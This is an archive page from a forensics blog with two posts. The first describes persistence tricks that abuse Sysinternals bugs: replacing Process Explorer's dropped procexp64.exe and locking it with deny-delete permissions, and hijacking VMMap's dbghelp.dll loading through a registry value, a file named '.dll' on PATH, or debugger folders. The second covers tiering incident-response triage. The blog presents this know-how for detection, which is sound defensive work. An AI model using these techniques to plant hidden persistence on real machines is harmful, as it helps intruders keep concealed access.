You are browsing the archive for Compromise Detection.

Beyond good ol’ Run key, Part 19

December 4, 2014 in Anti-Forensics, Autostart (Persistence), Compromise Detection, Forensic Analysis, Malware Analysis

In my last post I mentioned Sysinternals. While combining the info for that post I came across a few things that gave me enough material to write a #19 in the series.

And it’s based on bugs in Sysinternals’ tools. Bugs that can be spotted easily. Today I’ll explain how you can utilize these bugs to create new persistent mechanisms.

Say, you like Process Explorer.

Nowadays 64-bit systems are very popular so running procexp.exe on a 64-bit system ends up with a procexp.exe dropping its 64-bit version into a %TEMP% folder and launching it.

procexp

Now, what you can do is f.ex. copy your notepad.exe to %TEMP% and name it procexp64.exe. Then you need to set up 2 access rights for everyone:

  • One that forbids deleting %temp%\procexp64.exe (on the file itself)
  • One that forbids deleting subfolders and files inside %TEMP% (on the %TEMP% folder); this is btw. one of the WTFs of NTFS system where prohibiting deletion of the files needs to be extended to its parent folder; there must be some reasons for that, but it is not something you can learn about from a cryptic Security Properties tab

From now on, launching procexp.exe on a 64-bit system will always launch notepad.exe. A nice man-in-the-middle attack especially if the malicious notepad.exe actually does spawn the legitimate procexp64.exe and hides its presence somehow from the Process Explorer GUI.

Of course blocking %TEMP% from deletion is a silly idea, but:

  • it is an example only
  • it actually works
  • there are many other ways to prevent deletion of the procexp64.exe by procexp.exe (on exit), or at least ensure the malicious procexp64.exe is restored after it is being deleted

Another bug I spotted was the way vmmap.exe craves for dbghelp.dll.

VMMAP is not a very popular program and I bet not too many people use it daily, but the way it works requires a special attention; it’s an example of a difference between programming for your own use vs. programming for ‘public’. As a non-professional programmer who writes buggy programs every day I am actually quite surprised by it. Yes, it’s that buggy.

Let me elaborate.

VMMAP has a very peculiar way for searching for dbghelp.dll:

First, it searches for the entry in the Registry:

  • HKCU\Software\Sysinternals\VMMap\DbgHelpPath32 = <path to dbghelp.dll>
  • #persistence #1
    • By modifying HKCU\Software\Sysinternals\VMMap\DbgHelpPath32 to point to a malicious DLL we can ensure that DLL is loaded every time VMMAP is launched

If it is not found, VMMAP goes ballistic (#persistence #2..N).

It calls a LoadLibraryW with a NULL which is a (sort of) result of retrieving data from a non-existing HKCU\Software\Sysinternals\VMMap\DbgHelpPath32 value.

This is when things get crazy. The craving goes totally addictive.

NULL is a Pandora’s box (Or’ Pandor’s since the author is a male) open for LoadLibraryW.

It means it will walk through every directory listed in the PATH environment variable and will attempt to load a library called ‘.dll’ from every single directory on that list.

Yes, ‘.dll’ is a valid library name i.e. a NULL with a ‘.dll’ extension.

So, you can place a DLL called “.dll” in any location that is covered by a PATH environment variable and you will have it launched by VMMAP anytime it starts.

You probably want to hear that this is the end of the story.

Not quite so.

There are still a few places to look at:

  • C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll
  • C:\Program Files\Debugging Tools for Windows\dbghelp.dll
  • C:\Debuggers\dbghelp.dll

Dropping a dbghelp.dll in the …

yawnz…

you know the drill :)

The 3 stages of 3ages

November 27, 2014 in Compromise Detection, Malware Analysis, Preaching

Quick Update

Just to clarify: this is a critique of IR processes that rely on a single way of doing things which in certain circumstances is not the best; it may slow down your response time & give you a lot of unnecessary work. In other words: Alexious’ principle (see below) is a good way of doing things. Doing full or raw forensics on the example 400 hosts would be very inefficient. It mainly applies to daily IR/SOC work, not consulting gigs.

Original Post

The Digital Forensics world is a subject to trends the same way as is fashion.

A long time ago everyone would just do the bit-by-bit & offline forensics and that would be enough. Then ‘do not pull the plug’ idea came along and now no one dares to shut down the box until at least the volatile data is acquired. On the shoulders of the importance of volatile data came the notion of importance of memory forensics which concluded (as of 2014) in a phenomenal work of the Volatility team, an excellent tool and the best book about ‘all of it’ presented in the most digestible way ever.

Somewhere in the background a lot of research towards understanding of the internals of NTFS was also done, then it got digested by many, and finally converted into popular, and often free applications. It’s actually a good time to be in DFIR because tools are out there and you can crack cases in no time. On top of that, both memory and NTFS/$MFT forensics are probably the most attractive technical aspects of DFIR world in general due to technical difficulties associated with their everchanging complexity & simply speaking ‘it really takes time getting to understand how it all works, but it is very rewarding’ (c).

What could possibly go wrong?

The everlasting and omnipresent part of the DFIR work is the word ‘context’ a.k.a. scope (if you are from consulting or compliance world).

One thing I observe last few years is a very strange trend which can be formulated as:

  • triage is now equal to memory & $MFT forensics.

If you can do it quickly, have proper tools and know what you are doing  – it may actually work.

BUT

I believe that it’s often an over-engineered solution to a much simpler problem.

Context is REALLY important. And it dictates what you do and how you do it. And I believe that the context is always driven by the character of the investigation.

Let’s make an attempt to describe the various ‘levels’ of depths one can reach while doing DFIR work. It all is depending on… yes, you guessed it right – context (or scope).

  • Law Enforcements engaged / Criminal case
    • Full blown forensics with a major stress on accountability/logs/notes, chain of custody; and applied to every possible device you can find on the crime scene
    • Almost always goes to court, or the possibility is pretty high
    • You are SUPERCAREFUL, because everything you do is going to be shown to law interpreters [a.k.a. lawyers :)]
    • You use a very specific, self-protective language to describe your findings
  • Confirmed compromise with more than one aspect of C.I.A. triad being affected (e.g. PCI space, hacking cases)
    • Almost identical with the above case, with one extra bit – full forensics for the scoped systems + raw or light forensics in a ‘close neighborhood’
    • Surprisingly, it does not go to court that often, but sometimes it does. Whatever you do – do with an assumption it WILL go to the court one day. So, you are still VERY CAREFUL, take care of the chain of custody and statements
    • You also use a very specific, self-protective language to describe your findings
  • Day to day work on the IR/SOC team
    • Your role is to keep the company secure and literally speaking: find & close incidents
    • Usually you do Light forensics for all systems
    • Only and only if deeper intrusion is confirmed raw/full forensics are used

Same as in school, this is all about grades.

Just to be precise here: I have used some terms above which require further explanation:

  • light forensics – focus on data that is ‘easy’ to acquire with OS-only tools and a minimal impact on the system (minimal contamination) – this is not your memory forensics/ $MFT analysis yet; it is AV logs, “dir /a/s c: > evidence.txt”, “powershell gong foo”, “netstat”, “wmic /xyz/” variations, maybe later on autoruns and Sysinternals tools, etc. + copying it over to your box for further analysis
  • raw forensics – maybe there is a better name; if your light forensics didn’t detect anything and you suspect you need more – this is the time when you need to go deeper; natural progression is to look at $MFT and memory
  • full forensics – nothing to add, cuz there is nothing to remove; you go de Saint-Exuperian a.k.a. ballistic on this one & analyze everything & analyze it twice

The conclusion is this:

  • In a typical IR scenario, utilizing tools that are adequate for your task/role is very important
  • You do a MINIMUM first
  • Only, and only if it doesn’t deliver and you suspect you need to go deeper – then you go deeper; $MFT and volatile data can wait
  • In CI/A breaches you better do EVERYTHING you can think of

And to add some real-world case scenarios here: when I worked for a bank, we would sometimes have 400 infections in one go.

<rant>Thank you Java & Enterprise Solutions software market. You suck big time. There needs to be an audit in an every financial institution, or any large organization really to weed out enterprise parasites harvesting on gazillions of dollars in consulting hours and which result in producing terrible, really unforgivable program-wannabe pieces of executable code. That is CRAP.</rant>

Back to our topic. Employing full, or even raw forensics doesn’t make sense ALL THE TIME. All you have to do is to get a process list, file list, kill the bad process, remove the  drive-by exploit and reboot the system, verify all is good after a reboot.

No $MFT, no memory analysis. No full forensics.

Think of the Alexious principle:
1. What question are you trying to answer?
2. What data do you need to answer that question?
3. How do you extract that data?
4. What does that data tell you?